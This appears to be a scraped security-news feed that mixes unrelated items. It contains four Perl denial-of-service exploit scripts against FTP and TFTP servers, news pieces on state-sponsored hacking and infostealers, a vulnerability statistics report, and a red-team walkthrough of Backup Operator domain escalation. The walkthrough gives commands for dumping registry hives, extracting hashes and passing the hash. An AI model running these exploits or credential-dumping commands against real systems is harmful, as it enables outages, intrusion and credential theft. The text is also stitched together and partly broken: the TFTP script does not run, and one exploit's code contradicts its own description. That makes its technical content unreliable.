Solar FTP Server version 2.1.2 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: Solar FTP Server 2.1.2 - PASV - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 23 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/1o4xTt67bUJYAAKm0pqNIG99ly--xRQBp/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Solar FTP Server 2.1.2 - PASV - Denial of Service (DoS)  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=U9nH6gqyT88

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The FTP server does not correctly handle the amount of data or bytes sent.  
#When authenticating to the FTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

print "[+] Connecting to $ip:$port\n";  
my $s = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $port, Proto => 'tcp') or die "Could not connect to $host:$port\n";

$s->send("USER anon\r\n");  
my $response = <$s>;  
print $response;  
$s->send("PASS anon\r\n");  
$response = <$s>;  
print $response;  
$s->send("SYST\r\n");  
$response = <$s>;  
print $response;  
sleep(2);  
$s->send("PASV " . "\x41"x6631 . "\r\n");  
sleep(3);  
$response = <$s>;  
print $response;  
$response = <$s>;  
print $response;  
print ">>> Sending second payload\n";  
$s->send("PASV " . "\x90"x123 . "\x90"x2877 . "\r\n");  
$response = <$s>;  
print $response;  
sleep(2);

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "######################################################################\n";  
      print "#                                                                    #\n";        
      print "#             Solar FTP Server 2.1.2 - PASV - Denied of Service      #\n";  
      print "#                                                                    #\n";  
      print "#                       Coded by Fernando Mengali                    #\n";  
      print "#                                                                    #\n";  
      print "#                 e-mail: fernando.mengalli\@gmail.com               #\n";  
      print "#                                                                    #\n";  
      print "######################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

Solar FTP Server 2.1.2 Denial Of Service

Microsoft has acknowledged a cyberattack by Russians state sponsored group Cozy Bear who, it says, was looking how much information Microsoft holds about Cozy Bear.

In a spy-vs-spy type of scenario, Microsoft has acknowledged that a group called Midnight Blizzard (also known as APT29 or Cozy Bear), gained access to a Microsoft legacy non-production test tenant account.

According to Microsoft, the group managed to access the account in November after subjecting it to a password spray attack, a type of brute force attack where the attacker tries a large amount of logins until they succeed. The group used this foothold to access some of Microsoft’s corporate email accounts and steal some emails and attached documents.

Cozy Bear, who is generally linked to the Russian Foreign Intelligence Service, also known as the SVR, appears to have been curious to find out what information Microsoft had gathered about it. Cozy Bear is generally believed to be behind the SolarWinds attack and attacks on several US institutions, including the State Department, the White House, and the DNC. On all these occasions, the Dutch alerted the US intelligence services.

Microsoft’s investigation about the attack showed that the group was not after customer data or corporate information, but instead something closer to home:

> “The investigation indicates they were initially targeting email accounts for information related to Midnight Blizzard itself.”

To date, there is no evidence that the threat actor had any access to customer environments, production systems, source code, or AI systems, but the investigation is still ongoing. Microsoft has promised to provide additional details as appropriate.

Generally speaking, the larger an organization is, the larger the attack surface, but with companies like Microsoft people expect a tighter security. It is, after all, a security software vendor as well. So, the fact that Cozy Bear was able to stay undetected for months comes as a surprise to many.

Apparently, the attack scared Microsoft itself as well: It says that it feels the need to speed up its cyberprotection advancement project, the Secure Future Initiative, given how well-funded and resourced the attackers are.

> “We will act immediately to apply our current security standards to Microsoft-owned legacy systems and internal business processes, even when these changes might cause disruption to existing business processes.”

This attack can generally be seen as a warning to every other organization that has information which might be of interest to foreign governments.

The more an organization has grown, the larger the chance that legacy accounts exist and may even be neglected. Compare the organization to an office building: The more doors and windows (pun intended) exist, the larger the chance that one is left open. And if there are offices that are no longer in use, the chance of an opening grows exponentially.

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

 Microsoft got hacked by state sponsored group it was investigating 

Media organizations and high-profile experts in North Korean affairs have been at the receiving end of a new campaign orchestrated by a threat actor known as ScarCruft in December 2023.
"ScarCruft has been experimenting with new infection chains, including the use of a technical threat research report as a decoy, likely targeting consumers of threat intelligence like cybersecurity

Media organizations and high-profile experts in North Korean affairs have been at the receiving end of a new campaign orchestrated by a threat actor known as **ScarCruft** in December 2023.

"ScarCruft has been experimenting with new infection chains, including the use of a technical threat research report as a decoy, likely targeting consumers of threat intelligence like cybersecurity professionals," SentinelOne researchers Aleksandar Milenkoski and Tom Hegel said in a report shared with The Hacker News.

The North Korea-linked adversary, also known by the name APT37, InkySquid, RedEyes, Ricochet Chollima, and Ruby Sleet, is assessed to be part of the Ministry of State Security (MSS), placing it apart from Lazarus Group and Kimsuky, which are elements within the Reconnaissance General Bureau (RGB).

The group is known for its targeting of governments and defectors, leveraging spear-phishing lures to deliver RokRAT and other backdoors with the ultimate goal of covert intelligence gathering in pursuit of North Korea's strategic interests.

In August 2023, ScarCruft was linked to an attack on Russian missile engineering company NPO Mashinostroyeniya alongside Lazarus Group in what has been deemed as a "highly desirable strategic espionage mission" designed to benefit its controversial missile program.

Earlier this week, North Korean state media reported that the country had carried out a test of its "underwater nuclear weapons system" in response to drills by the U.S., South Korea, and Japan, describing the exercises as a threat to its national security.

The latest attack chain observed by SentinelOne targeted an expert in North Korean affairs by posing as a member of the North Korea Research Institute, urging the recipient to open a ZIP archive file containing presentation materials.

While seven of the nine files in the archive are benign, two of them are malicious Windows shortcut (LNK) files, mirroring a multi-stage infection sequence previously disclosed by Check Point in May 2023 to distribute the RokRAT backdoor.

There is evidence to suggest that some of the individuals who were targeted around December 13, 2023, were also previously singled out a month prior on November 16, 2023.

SentinelOne said its investigation also uncovered malware – two LNK files ("inteligence.lnk" and "news.lnk") as well as shellcode variants delivering RokRAT – that's said to be part of the threat actor's planning and testing processes.

While the former shortcut file just opens the legitimate Notepad application, the shellcode executed via news.lnk paves the way for the deployment of RokRAT, although this infection procedure is yet to be observed in the wild, indicating its likely use for future campaigns.

The development is a sign that the nation-state hacking crew is actively tweaking its modus operandi likely in an effort to circumvent detection in response to public disclosure about its tactics and techniques.

"ScarCruft remains committed to acquiring strategic intelligence and possibly intends to gain insights into non-public cyber threat intelligence and defense strategies," the researchers said.

"This enables the adversary to gain a better understanding of how the international community perceives developments in North Korea, thereby contributing to North Korea's decision-making processes."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Hackers Weaponize Fake Research to Deliver RokRAT Backdoor

EzServer version 6.4.017 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket;

# Exploit Title: EzServer 6.4.017 - Denied of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 22 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/1hCYYsWsyeuoHTh3ZosNRbtIBxw0culsu/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: EzServer 6.4.017 - Denied of Service (DoS)  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denied of Service (DoS)

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The FTP server does not correctly handle the amount of data or bytes sent to command RNTO.  
#When authenticating to the FTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denied of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x41"x10698;

    my $sock = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $port, Proto => 'tcp') or die "[-] Could not connect!\n";  
    $sock->send($payload);  
    $sock->close();

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print q {

                            _/|       
                           // o\      
                           || ._)    
                           //__\     
                           )___(   

      [+] EzServer 6.4.017 - Denied of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

EzServer 6.4.017 Denial Of Service

Golden FTP Server version 2.02b remote denial of service exploit.

    #!/usr/bin/perluse IO::Socket::INET;# Exploit Title: Golden FTP Server 2.02b - Denial of Service (DoS)# Discovery by: Fernando Mengali# Discovery Date: 21 january 2024# Vendor Homepage:  N/A# Download to demo: https://drive.google.com/file/d/1AK6x0xKwjVZxoNHbCOIJsIiRAWeMmP_0/view?usp=sharing# Notification vendor: No reported# Tested Version: Golden FTP Server 2.02b - Denial of Service (DoS)# Tested on: Window XP Professional - Service Pack 2 and 3 - English# Vulnerability Type: Denial of Service (DoS)#1. Description#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).#For this exploit I have tried several strategies to increase reliability and performance:#Jump to a static 'call esp'#Backwards jump to code a known distance from the stack pointer.#The FTP server does not correctly handle the amount of data or bytes sent to command RNTO.#When authenticating to the FTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.#2. Proof of Concept - PoC    $sis="$^O";    if ($sis eq "windows"){      $cmd="cls";    } else {      $cmd="clear";    }    system("$cmd");        intro();    main();        print "[+] Exploiting... \n";print "[+] Connecting to $ip:$port\n";my $s = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $port, Proto => 'tcp') or die "Could not connect to $host:$port\n";$s->send("USER anon\r\n");my $response = <$s>;print $response;$s->send("PASS anon\r\n");$response = <$s>;print $response;$s->send("SYST\r\n");$response = <$s>;print $response;sleep(2);$s->send("PASV " . "\x41"x6631 . "\r\n");sleep(3);$response = <$s>;print $response;$response = <$s>;print $response;print ">>> Sending second payload\n";$s->send("PASV " . "\x90"x123 . "\x90"x2877 . "\r\n");$response = <$s>;print $response;sleep(2);    print "[+] Done - Exploited success!!!!!\n\n";     sub intro {      print q {                              ,--,                       _ ___/ /\|                   ,;'( )__, )  ~                  //  //   '--;                   '   \     | ^                       ^    ^      [+] Golden FTP Server 2.02b - Denied of Service (DoS)      [*] Coded by Fernando Mengali      [@] e-mail: fernando.mengalli@gmail.com      }  }  sub main {our ($ip, $port) = @ARGV;      unless (defined($ip) && defined($port)) {        print "       \nUsage: $0 <ip> <port>                 \n";        exit(-1);      }  }

Golden FTP Server 2.02b Denial Of Service

ProSysInfo TFTP Server TFTPDWIN version 0.4.2 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 20 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/1MLqBkCyu0dA-cNgYxCAO8xbsVcof060Z/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: ProSysInfo TFTP Server TFTPDWIN 0.4.2  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=BuONti1AWoU

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The TFTP server does not correctly handle the amount of data or bytes sent..  
#When authenticating to the TFTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x41"x520;

my $socket = IO::Socket::INET->new(  
    PeerAddr => $tftp_server,  
    PeerPort => 69,  
    Proto    => 'udp'  
) die "Não foi possível conectar ao servidor TFTP: $!\n" unless $socket;

    print $ftp_socket $buffer;

    close($socket);

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "######################################################################\n";  
      print "#                                                                    #\n";        
      print "#     ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Denied of Service      #\n";  
      print "#                                                                    #\n";  
      print "#                       Coded by Fernando Mengali                    #\n";  
      print "#                                                                    #\n";  
      print "#                 e-mail: fernando.mengalli\@gmail.com               #\n";  
      print "#                                                                    #\n";  
      print "######################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

ProSysInfo TFTP Server TFTPDWIN 0.4.2 Denial Of Service

We analyzed 2,5 million vulnerabilities we discovered in our customer’s assets. This is what we found.

Digging into the data
The dataset we analyze here is representative of a subset of clients that subscribe to our vulnerability scanning services. Assets scanned include those reachable across the Internet, as well as those present on internal networks. The data includes findings for network

**_We analyzed 2,5 million vulnerabilities we discovered in our customer's assets. This is what we found._****Digging into the data**

The dataset we analyze here is representative of a subset of clients that subscribe to our vulnerability scanning services. Assets scanned include those reachable across the Internet, as well as those present on internal networks. The data includes findings for network equipment, desktops, web servers, database servers, and even the odd document printer or scanning device.

The number of organizations in this dataset is smaller (3 less) than the previous dataset used in last year's Security Navigator 2023 and some organizations were replaced by new additions. With the change of organizations comes a different mix of assets, which leaves comparing the previous results akin to comparing apples to oranges (we might be biased), but it's still worth noting similar patterns where possible.

This year, we revisit the menacing vulnerability theme with an eye on the ever-present and lingering tail of unresolved system weaknesses. The waves of newly discovered serious issues are just for our attention with existing unresolved issues, seeming like a hydra that keeps on growing new snaking heads as soon as you dispatch others.

Assessing whether a system is adequately protected is a challenge that requires skill and expertise and can take a lot of time. But we want to learn of any weaknesses beforehand rather than having to deal with the fallout of an unplanned "free pentest" by a random Cy-X group.

**Security Navigator 2024 is Here - Download Now#**

The newly released Security Navigator 2024 offers critical insights into current digital threats, documenting 129,395 incidents and 25,076 confirmed breaches. More than just a report, it serves as a guide to navigating a safer digital landscape.

****What's Inside?**#**

*   📈 **In-Depth Analysis:** Explore trends, attack patterns, and predictions. Learn from case studies in CyberSOC and Pentesting.
*   🔮 **Future-Ready:** Equip yourself with our security predictions and research summary.
*   👁️ **Real-Time Data:** From Dark Net surveillance to industry-specific statistics.

Stay one step ahead in cybersecurity. Your essential guide awaits!

🔗 Get Your Copy Now

**Vulnerability Scanning Findings by Severity**

Examining the severity rating share per unique Finding we see that the bulk of unique Findings, 79%, are classified as 'High' or 'Medium'. However, it is also worth noting that half, 50.4%, of unique Findings are considered 'Critical' or 'High.'

The average number of 'Critical' or 'High' Findings has decreased by 52.17% and 43.83%, respectively, compared to our previously published results. An improvement can also be observed for Findings with severity ratings 'Medium' and 'Low' being down 29.92% and 28.76%. As this report uses a slightly different sample of clients to last year, a YoY comparison has limited value, but we see evidence that clients are responding well to the findings we report, resulting in an overall improvement.

The majority of Findings (78%) rated 'Critical' or 'High' are 30 days or younger (when looking at a 120-day window). Conversely, 18% of all findings rated 'Critical' or 'High' are 150-days or older. From a prioritization perspective, 'Critical' or 'High' real findings seem to be dealt with swiftly, but some residual still accumulates over time. We see, therefore, that unresolved Findings continue to grow older. Indeed, ~35% of all unique CVEs are from findings 120 days or older.

The chart above shows the long tail of unresolved real findings. Note the first remarkable long tail peak around 660 days and the second one at 1380 days (3 years and 10 months).

**A window of opportunity**

The high average numbers of 'Critical' and 'High' findings are largely influenced by assets running Microsoft Windows or Microsoft Windows Server operating systems. Assets running operating systems other than Microsoft, such as Linux-based OS, are present, but these are reported proportionally far less.

We should note, however, that the 'Critical' or 'High' findings associated with assets running Windows are not necessarily vulnerabilities in the operating system but can also be related to applications running on the asset.

It is perhaps understandable that unsupported Microsoft Windows and Windows Server versions are prominent here, but it is surprising to find more recent versions of these operating systems with severities rated as 'Critical' or 'High'.

**Industry perspective**

We are using NAICS for our industry classification. The results here only consider Findings based on scans of hosts rather than services such as web applications. The average unique real Finding per unique asset is 31.74 across all organizations, denoted by the dashed horizontal line in the chart below.

Our clients in the Construction industry appear to be performing exceptionally well compared to clients in other industries, with an average of 12.12 Findings per Asset. At the opposite end of the spectrum, we have the Mining, Quarrying, and Oil and Gas industries, where we report an average of 76.25 unique findings per asset. Clients in Public Administration surprised us by outperforming Finance and Insurance with an average of 35.3 Findings per Asset, compared with 43.27, despite the larger number of Assets. Of course, these values are derived from the set of clients present in our sample and may not represent the universal reality.

When comparing the average severity per unique asset per Industry, we see a mixed picture. We can ignore Health Care and Social Assistance and Information, with a relatively small unique asset count, that results in averages that are disproportionate in relation to other Industries.

Our overall Industry average for Severity rating High is 21.93 and Mining, Quarrying and Oil and Gas Extraction have more than double that average.

Similarly, Finance and Insurance with Accommodation and Food Services also overshot the overall average by 10.2 and 3.4 findings per unique asset, respectively. The same three Industries exceeded the overall average for findings rated Critical, with Accommodation and Food Servers doing so by almost a factor of 3.

**Vulnerability is getting old**

As we revisit the menacing vulnerability theme this year, we once again look suspiciously at the ever-present and lingering tale of unresolved system weaknesses that are just getting older. We assessed over 2.5m vulnerability findings that we reported to our clients and over 1,500 reports from our professional ethical hackers to understand the current state of security vulnerabilities and consider their role and effectiveness as a tool for prioritization.

The bulk of unique Findings reported by our scanning teams - 79% - are classified as 'High' or 'Medium,' and 18% of all serious findings are 150 days or older. Though these are generally dealt with more swiftly than others, some residuals still accumulate over time. While most findings we identify are resolved after 90 days, 35% of all findings we report persist for 120 days or longer. And way too many are never addressed at all.

Our scanning results illuminate the persistent problem of unpatched vulnerabilities. Meanwhile, our Ethical Hacking teams more frequently encounter newer applications and systems built on contemporary platforms, frameworks, and languages.

The role of the Ethical Hacker is to conduct Penetration Tests – to emulate a malicious attacker and assess a system, application, device, or even people for vulnerabilities that could be used to gain access or deny access to IT resources.

Penetration Testing is generally considered a component of Vulnerability Management but could also be seen as a form of Threat Intelligence that businesses should leverage as part of their proactive defense strategy.

17.67% of findings our Ethical Hackers reported were rated as 'Serious', but, on a brighter note, hackers must work harder today to discover them than they had to in the past.

This is just an excerpt of the analysis. More details on our analysis of vulnerabilities and Pentesting (as well as a ton of other interesting research topics like VERIS categorization of the incidents handled in our CyberSOCs, Cyber Extortion statistics and an analysis of Hacktivism) can be found in the **Security Navigator**. Just fill in the form and get your download. It's worth it!

**Note:** _This informative piece has been expertly crafted and generously shared by Charl van der Walt, Head of the Security Research Center, Orange Cyberdefense._

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

52% of Serious Vulnerabilities We Find are Related to Windows 10

Cybersecurity researchers have discovered a new Java-based "sophisticated" information stealer that uses a Discord bot to exfiltrate sensitive data from compromised hosts.

The malware, named NS-STEALER, is propagated via ZIP archives masquerading as cracked software, Trellix security researcher Gurumoorthi Ramanathan said in an analysis published last week.

The ZIP file contains

Browser Security / Cyber Threat

Cybersecurity researchers have discovered a new Java-based "sophisticated" information stealer that uses a Discord bot to exfiltrate sensitive data from compromised hosts.

The malware, named **NS-STEALER**, is propagated via ZIP archives masquerading as cracked software, Trellix security researcher Gurumoorthi Ramanathan said in an analysis published last week.

The ZIP file contains within it a rogue Windows shortcut file ("Loader GAYve"), which acts as a conduit to deploy a malicious JAR file that first creates a folder called "NS-<11-digit\_random\_number>" to store the harvested data.

To this folder, the malware subsequently saves screenshots, cookies, credentials, and autofill data stolen from over two dozen web browsers, system information, a list of installed programs, Discord tokens, Steam and Telegram session data. The captured information is then exfiltrated to a Discord Bot channel.

"Considering the highly sophisticated function of gathering sensitive information and using X509Certificate for supporting authentication, this malware can quickly steal information from the victim systems with \[Java Runtime Environment\]," Ramanathan said.

"The Discord bot channel as an EventListener for receiving exfiltrated data is also cost-effective."

The development comes as the threat actors behind the Chaes (aka Chae$) malware have released an update (version 4.1) to the information stealer with improvements to its Chronod module, which is responsible for pilfering login credentials entered in web browsers and intercepting crypto transactions.

Infection chains distributing the malware, per Morphisec, leverage legal-themed email lures written in Portuguese to deceive recipients into clicking on bogus links to deploy a malicious installer to activate Chae$ 4.1.

But in an interesting twist, the developers also left behind messages for security researcher Arnold Osipov – who has extensively analyzed Chaes in the past – expressing gratitude for helping them improve their "software" directly within the source code.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

NS-STEALER Uses Discord Bots to Exfiltrate Your Secrets from Popular Browsers

A list of topics we covered in the week of January 15 to January 21 of 2024

Skip to content

*   Contact Us
    *   Personal Support
    *   Business Support
    *   Talk to Sales
    *   Contact Press
    *   Partner Programs
    *   Submit Vulnerability
*   Company
    *   About Malwarebytes
    *   Careers
    *   News & Press
*   Sign In
    *   **MyAccount sign in:** manage your personal or Teams subscription >
    *   **Cloud Console sign in:** manage your cloud business products >
    *   **Partner Portal sign in:** management for Resellers and MSPs >

*   Personal
*   Business
    
    < Business
    
    BUNDLES
    
    *   Core
    *   Prevent and remediate threats and identify vulnerabilities
    *   Advanced
    *   Utilize threat guidance and patch management plus everything in **Core**
    *   Elite
    *   Deploy Managed Detection and Response plus everything in **Advanced**
    *   Ultimate
    *   Protect against categories of malicious websites plus everything in **Elite**
    
    TECHNOLOGY HIGHLIGHTS
    
    *   Managed Detection & Response (MDR)
    *   Deploy fully-managed threat monitoring, investigation, and remediation
    *   Endpoint Detection & Response (EDR)
    *   Prevent more attacks with security that catches what others miss
    *   Security Advisor
    *   Visualize and optimize your security posture in just minutes
    *   For Education
    *   Secure your students and institution against cyberattacks
    
    Learn more about Security Advisor (available in every bundle) and see the full list of our products and services.
    
    Full technology list >
    
*   Pricing
    
    < Pricing
    
    Protect your personal devices and data
    
    Protect your team’s devices and data
    
    Explore our award-winning endpoint security products, from EP to EDR to MDR
    
*   Partners
*   Resources
    
    *   Reviews
    *   Analyst Reports
    *   Case Studies
    
*   Support
    
    Featured Content
    
    *   Activate Malwarebytes Privacy on Windows device.
    

**RELATED ARTICLES**

January 22, 2024 - Russian state-sponsored actor Coldriver uses spear phishing attacks to install the Spica backdoor on victim systems.

January 20, 2024 - A nonprofit study claims that Google is failing to delete location history that reveals users' physical trips to abortion clinics.

January 19, 2024 - Google wants you to know you can still be tracked when you're incognito.

January 19, 2024 - CISA has added two Citrix NetScaler vulnerabilities to its vulnerability catalog, with a very short deadline to patch.

January 18, 2024 - Google has issued a security update for the Chrome browser that includes a patch for one zero-day vulnerability.

 A week in security (January 15 &#8211; January 21) 

The Backup Operators is a Windows built-in group. Users which are part of this group have permissions to perform backup and restore operations. More specifically,… 
Continue reading → Domain Escalation – Backup Operator

The Backup Operators is a Windows built-in group. Users which are part of this group have permissions to perform backup and restore operations. More specifically, these users have the _SeBackupPrivilege_ assigned which enables them to read sensitive files from the domain controller i.e. Security Account Manager (SAM).

In the event that a user which has the _SeBackupPrivilege_ permission is compromised during red team operations this can provide a direct route to compromise the domain. Since this privilege has the permission to read and retrieve sensitive hives from the domain controller such as SAM, SECURITY and SYSTEM which There are multiple proof of concepts which have been disclosed publicly and can be utilized from different perspective to perform domain escalation i.e. implant, PowerShell, non-domain joined etc.

**Implant**

It is trivial to identify the user group membership by executing the command below:

    shell net user peter /domain

Backup Operator Privilege

It should be noted that the _SeBackupPrivilege_ it is not enabled by default even though the user is part of the Backup Operators group. Typically, this privilege is obtained when the implant is running from an elevated (it should not be confused with local administrator privileges) session using the credentials of the Backup Operator user. Executing the command below will obtain group and privilege information.

    whoami /all

Backup Operator – whoami /all

A .NET assembly has implemented by snovvcrash called RegSave which enables red team operators to conduct the technique via an implant. The tool can perform Active Directory enumeration to identify which groups have permissions over the registry.

    dotnet inline-execute /home/kali/RegSave.exe -t dc.red.lab --acl

RegSave – Access Control List

Using the _–backup_ flag will export the registry hives into a readable and accessible location in the domain controller. These files could be retrieved for an offline analysis with Impacket.

    dotnet inline-execute /home/kali/RegSave.exe -t dc.red.lab -o C:\Windows\SYSVOL\sysvol\red.lab\scripts --backup

RegSave

Verification that these files are accessible is feasible by executing the following command from the implant.

    dir \\10.0.0.1\C$\Windows\SYSVOL\sysvol\red.lab\scripts

List Hives DC

An alternative approach would be to dump the SAM, SECURITY and SYSTEM hives into a UNC share. The _smbserver_ from impacket suite can set up a simple SMB server:

    impacket-smbserver -smb2support share /tmp/share

SMB Share

The BackupOperatorToDA is a proof of concept written in C++ which can target domain controllers using an account which is part of the Backup Operators group. The proof of concept can export the registry hives into _C:\\temp_ path or into a UNC share.

    BackupOperatorToDA.exe -t \\dc.red.lab -u peter -p Password123 -d red.lab -o //10.0.0.3/share/BackupOperatorToDA.exe -t \\dc.red.lab -u peter -p Password123 -d red.lab -o C:\temp

BackupOperatorToDA

SAM Hive

UNC Share – SAM Hive

Using the exported files _secretsdump_ from Impacket can decrypt the contents of the SAM registry hive into order to dump local hashes of the domain controller.

    impacket-secretsdump -sam /tmp/share/SAM -system /tmp/share/SYSTEM -security /tmp/share/SECURITY LOCAL

Dump Domain Hashes

Using the hash of the domain controller machine account it is feasible also to dump all the domain hashes.

    impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:73ba6ef0d8ae6a755fc118e8df6540f7 -just-dc red/dc\$@10.0.0.1

Dump Domain Hashes

Using the password hash of the domain administrator it is possible to access the domain controller directly using a WMI connection.

    impacket-wmiexec Administrator@10.0.0.1 -hashes ':58a478135a93ac3bf058a5ea0e8fdb71'

impacket-wmiexec

**PowerShell**

As it has been mentioned above by default the _SeBackupPrivilege_ is disabled even if the user is part of the Backup Operators group. Giuliano Cioffi developed two DLL’s which can be used to enable the required privilege from a PowerShell console.

Import-Module .\\SeBackupPrivilegeUtils.dll
Import-Module .\\SeBackupPrivilegeCmdLets.dll
Get-SeBackupPrivilege
Set-SeBackupPrivilege
Get-SeBackupPrivilege
whoami /priv | findstr Backup

SeBackupPrivilege

Verification of the permissions over the domain controller is feasible by listing the files on the C$ share.

Access DC C$

It is also useful to enumerate which groups have the _SeBackupPrivilege_ as in a corporate environment there might be custom groups outside of the standards like Domain Administrators and Backup Operators. Executing the following commands will retrieve the group Security Identifiers that have this privilege. PowerShell can also convert the principal security identifiers into a readable format.

Get-ChildItem -Path \\\\$ENV:USERDNSDOMAIN\\sysvol\\$ENV:USERDNSDOMAIN\\Policies\\ -Recurse -File  -ErrorAction SilentlyContinue | Select-String "SeBackupPrivilege"

# Give SID as input to .NET Framework Class
$SID = New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-1326752099-4012446882-462961959-1103")

# Use Translate to find user from sid
$objUser = $SID.Translate(\[System.Security.Principal.NTAccount\])

# Print the converted SID to username value
$objUser.Value

Identify Groups with Backup Privilege

The BackupOperatorToolkit has four different modes to perform domain escalation from the Backup Operators group. Specifically, the _service_ mode will create a service in the domain controller that will executed during reboot via registry modifications, the _DSRM_ mode will modify _DsrmAdminLogonBehavior_ registry key to enable Windows Remote Management Authentication (WinRM), the DUMP mode will dump the SAM, SECURITY and SYSTEM hives to a local path in the domain controller or to a UNC path and the _IFEO_ mode which will run an application (i.e. implant) when a process is terminated.

.\\BackupOperatorToolkit.exe DUMP C:\\tmp \\\\dc.red.lab

BackupOperator Toolkit

Dump Registry Hives

**Non-Domain Joined**

In insider threat scenarios it might be possible to use a host which is not part of the domain. Using a python tool it is possible to initiate an authentication with the domain controller from an account which is part of the Backup Operators group. The tool will export the SAM, SECURITY and SYSTEM registry hives into a arbitrary SMB share.

    python3 reg.py  peter:'Password123'@10.0.0.1 backup -p '//10.0.0.3/share'

Backup Operator – Non Domain Joined

Using the SAM, SYSTEM and SECURITY hives in conjunction with _secretsdump_ will extract the hashes from the SAM file.

    impacket-secretsdump -sam /tmp/share/SAM -system /tmp/share/SYSTEM -security /tmp/share/SECURITY LOCAL

Impacket-secretsdump

The password hash of the domain controller machine account can be used to verify authentication with the domain controller using _crackmapexec_:

    crackmapexec smb 10.0.0.1 -u DC\$ -H 73ba6ef0d8ae6a755fc118e8df6540f7

crackmapexec

**References**

1.  https://github.com/horizon3ai/backup\_dc\_registry
2.  https://github.com/decoder-it/BadBackupOperator/
3.  https://decoder.cloud/2018/02/12/the-power-of-backup-operatos/
4.  https://github.com/giuliano108/SeBackupPrivilege
5.  https://cube0x0.github.io/Pocing-Beyond-DA/
6.  https://github.com/Wh04m1001/Random/blob/main/BackupOperators.cpp
7.  https://github.com/improsec/BackupOperatorToolkit
8.  https://github.com/snovvcrash/RemoteRegSave
9.  https://github.com/mpgn/BackupOperatorToDA
10.  https://adsecurity.org/?p=3700

**Post navigation**

Tag

#windows